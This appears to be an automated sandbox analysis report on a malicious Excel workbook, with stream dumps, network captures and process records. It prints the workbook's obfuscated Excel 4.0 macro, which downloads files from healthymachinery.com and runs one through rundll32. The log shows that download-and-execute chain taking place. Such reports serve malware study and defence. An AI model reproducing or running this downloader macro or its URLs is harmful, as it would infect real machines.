                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 70 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.271885406754
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 54588
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Book
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                      Stream Size:54588
                                                                                                                                                      Entropy:4.12824675227
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . Y u Z h o u L e e B . . . . . . . . . . . . . . . . . . . . . . . K l o p s . . . . . . . . . . . . . . . . . . N i o k a s e r . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0b 59 75 20 5a 68 6f 75 20 4c 65 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      ,,,,,,,,,,"=EXEC(""r""&Base!V56&"" ""&Base!V55&"",D""&Base!V57)",,"=REGISTER(Base!W51&Base!W52&Base!W53&Base!W54&Base!W55&Base!W56,Base!X50&Base!X51&Base!X52&Base!X53&Base!X54&Base!X55&Base!X56&Base!X57&Base!X58&Base!X59&Base!X60&Base!X61&Base!X62&Base!X63&Base!X64&Base!X65&Base!X66&Base!X67,Base!W59&Base!W60&Base!W61&Base!W62&Base!W63&Base!W64,Base!W66,,1,9)"=C153(),,,"=Niokaser(0,""h""&Base!V54&C166&B170,Base!V55,0,0)",,,"=Niokaser(0,Base!V54&C167&B170,Base!V55&""1"",0,0)",,,"=Niokaser(0,Base!V54&C168&B170,Base!V55&""2"",0,0)",,,"=Niokaser(0,Base!V54&C169&B170,Base!V55&""3"",0,0)",,,"=Niokaser(0,Base!V54&C170&B170,Base!V55&""4"",0,0)",,,,,,,,,,,,,,,,=HALT(),=GOTO(D153),=GOTO(B153),,,,,healthymachinery.com/health/32-422-76.assp,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 21:48:08.183939934 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:48:08.224925041 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.225020885 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:48:08.225508928 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:48:08.266571999 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.277364016 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.277409077 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.277426958 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.277426958 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:48:08.277451992 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:48:08.277475119 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:49:55.044935942 CET4970980192.168.2.3104.21.29.200
                                                                                                                                                      Feb 22, 2021 21:49:55.087521076 CET8049709104.21.29.200192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:55.087727070 CET4970980192.168.2.3104.21.29.200

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 21:47:52.531856060 CET4919953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:52.583404064 CET53491998.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:47:53.662417889 CET5062053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:53.711051941 CET53506208.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:47:53.859833002 CET6493853192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:53.921314001 CET53649388.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:47:54.846545935 CET6015253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:54.898451090 CET53601528.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:47:56.244673014 CET5754453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:56.293715000 CET53575448.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:47:57.643233061 CET5598453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:47:57.694721937 CET53559848.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:01.811006069 CET6418553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:01.859726906 CET53641858.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:04.047180891 CET6511053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:04.100208998 CET53651108.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:05.070595026 CET5836153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:05.128232002 CET53583618.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:05.488641977 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:05.537441015 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:05.663378000 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:05.712105989 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:06.504277945 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:06.562623024 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:07.511538982 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:07.589133978 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.111622095 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:08.181504011 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:08.305510044 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:08.354279995 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:09.508025885 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:09.526731968 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:09.558465958 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:09.587913036 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:10.643405914 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:10.692132950 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:11.891923904 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:11.943871021 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:13.011121035 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:13.062844992 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:13.535598040 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:13.592812061 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:14.212485075 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:14.261445045 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:16.756052017 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:16.804770947 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:17.534955978 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:17.583803892 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:18.360730886 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:18.409473896 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:27.451472044 CET5872253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:27.454425097 CET5659653192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:27.454488039 CET6410153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:27.500215054 CET53587228.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:27.503139019 CET53641018.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:27.518770933 CET53565968.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:28.721322060 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:28.770173073 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:30.043479919 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:30.103857040 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:31.222280979 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:31.294020891 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:35.314347982 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:35.365928888 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:47.905416012 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:47.954416990 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:48:54.722866058 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:48:54.783260107 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:11.175189018 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:49:11.226608038 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:16.843122959 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:49:16.904299021 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:31.237010002 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:49:31.288753033 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:35.302491903 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:49:35.354060888 CET53606338.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:49:35.859028101 CET6129253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:49:35.907744884 CET53612928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 21:50:08.121093035 CET6361953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 21:50:08.169994116 CET53636198.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Feb 22, 2021 21:48:08.111622095 CET192.168.2.38.8.8.80x107bStandard query (0)healthymachinery.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Feb 22, 2021 21:48:08.181504011 CET8.8.8.8192.168.2.30x107bNo error (0)healthymachinery.com104.21.29.200A (IP address)IN (0x0001)
                                                                                                                                                      Feb 22, 2021 21:48:08.181504011 CET8.8.8.8192.168.2.30x107bNo error (0)healthymachinery.com172.67.149.197A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • healthymachinery.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349709104.21.29.20080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Feb 22, 2021 21:48:08.225508928 CET1226OUTGET /health/32-422-76.assp HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: healthymachinery.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Feb 22, 2021 21:48:08.277364016 CET1227INHTTP/1.1 200 OK
                                                                                                                                                      Date: Mon, 22 Feb 2021 20:48:08 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Set-Cookie: __cfduid=d78344390e76facbfb030afd09b52fea41614026888; expires=Wed, 24-Mar-21 20:48:08 GMT; path=/; domain=.healthymachinery.com; HttpOnly; SameSite=Lax
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      cf-request-id: 086d18ec4200004a567e819000000001
                                                                                                                                                      Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9zfFYI9n9natacGYox5B9un6Cm%2BkceIQzsN6jEZahlQWINzZ81nOgeCoHdTR0ih%2FK%2BYTt%2Fw5%2BDK3xHRBnxNS6p3iVk1Tspeq0WCEPNey1GVLxn7now%3D%3D"}]}
                                                                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 625b90f39ddf4a56-FRA
                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                      Data Raw: 36 64 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 58 6d 6f dc 36 12 fe be bf 62 ac 03 ea 04 30 a5 5d bf c7 d6 aa 68 13 b7 30 d0 43 8d 8b 83 5c 51 04 06 45 8e 24 c6 14 a9 90 d4 ae 17 b9 fc f7 03 29 ee 5a eb 97 b4 be 2f 07 18 b0 48 0e 1f ce 0c 9f 79 48 6e be f3 ee f7 b7 d7 7f 5c 5d 40 e3 5a 59 4c f2 1d 42 fe 14 15 48 07 97 17 70 f2 a9 80 dc 0f 00 93 d4 da 79 a2 34 f9 6c 41 e0 31 68 c9 05 26 20 a9 aa e7 09 2a f2 e1 7d 52 40 be f3 27 2a 2e aa 4f 84 dc 43 45 1c 80 a7 a1 4e 5e 06 75 fa 1d a8 d3 17 40 d5 2e a2 f9 8e a7 a2 7c 8c 42 c8 36 52 83 94 17 93 dc 09 27 b1 78 df db 0e 99 43 0e 5d 23 6c 23 54 0d 56 38 84 ff c0 5b a9 7b 5e 49 6a 30 cf 06 db 49 de a2 a3 c0 1a 6a 2c ba 79 f2 e1 fa 17 72 9a 40 b6 1e 68 9c eb 08 7e e9 c5 62 9e bc d5 ca a1 72 e4 7a d5 61 02 6c 68 cd 13 87 77 2e f3 3e 9f 6f 60 be 87 f2 6f f2 e1 27 f2 56 b7 1d 75 a2 94 63 a0 cb 8b f9 05 af 71 8f 35 46 b7 38 9f 8d 00 14 6d 71 9e 18 5d 6a 67 47 33 94 16 8a e3 dd 1e 28 5d 69 29 f5 f2 d1 94 85 c0 65 a7 8d 1b 4d 5a 0a ee 9a 39 c7 85 60 48 42 63 4f 28 e1 04 95 c4 32 2a 37 0b 4b a1 6e c1 a0 9c 27 d6 ad 24 da 06 d1 25 20 f8 3c 61 d5 cd d0 45 98 b5 09 34 06 ab 79 92 31 ae 08 ab 45 36 0c 65 ac 4a d1 18 6d 6c 1a 8c dc aa c3 98 ab d0 6e 91 0b 3a 4f 2c 33 88 6a af 33 fa 33 32 27 b4 1a d6 de a2 fe 9b 4f c5 f3 ce ec de 3b 23 d0 fb b3 fb 97 fe 08 7c b9 4b db 74 0b 90 0f e7 17 a5 e6 ab af 2d 35 b5 50 67 d3 f3 8e 72 2e 54 7d 36 fd 96 0f 2e 14 93 c9 88 f2 e8 23 9b 4d 23 e9 27 b9 65 46 74 ae 98 00 88 0a 5e ed 28 ba 10 35 75 da a4 4c eb 5b 81 17 8a 96 12 f9 6b f8 3a f1 35 b7 14 8a eb 65 4a 39 bf 58 a0 72 bf 09 eb 50 a1 79 b5 fb ee f7 7f 46 9a fe a6 29 47 be bb 07 55 af 42 18 f0 6a 3d 1b 60 41 0d 44 60 09 73 e0 9a f5 2d 2a 97 d6 e8 2e 24 fa cf 9f 57 97 fc d5 ee 60 43 a8 44 e3 76 5f 9f
                                                                                                                                                      Data Ascii: 6d1Xmo6b0]h0C\QE$)Z/HyHn\]@ZYLBHpy4lA1h& *}R@'*.OCEN^u@.|B6R'xC]#l#TV8[{^Ij0Ij,yr@h~brzalhw.>o`o'Vucq5F8mq]jgG3(]i)eMZ9`HBcO(2*7Kn'$% <aE4y1E6eJmln:O,3j332'O;#|Kt-5Pgr.T}6.#M#'eFt^(5uL[k:5eJ9XrPyF)GUBj=`AD`s-*.$W`CDv_
                                                                                                                                                      Feb 22, 2021 21:48:08.277409077 CET1228INData Raw: c7 d9 eb 99 69 88 2b e5 c2 76 92 ae 60 0e bb a5 d4 ec 76 77 b0 fb f6 7a 02 f0 6d 92 67 eb d0 1e 95 ed 64 92 67 b1 72 7d ee 7c f0 39 17 8b c8 31 b2 34 b4 eb d0 24 45 80 0b 23 51 15 58 35 b8 04 eb 0f 12 b6 d6 37 a3 c7 a1 1d d9 3a 8a 21 01 4e 1d 25
                                                                                                                                                      Data Ascii: i+v`vwzmgdgr}|914$E#QX57:!N%Pe%u5'f0Iq%Z;Fj<b1#zV!<%{}6A/Lr;;&iK+jy&H{Z+{?y?v6R(LFXP%JFnD8kV
                                                                                                                                                      Feb 22, 2021 21:48:08.277426958 CET1228INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:21:48:04
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x3e0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:21:48:08
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\MORI.BAST,DllRegisterServer
                                                                                                                                                      Imagebase:0x13b0000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >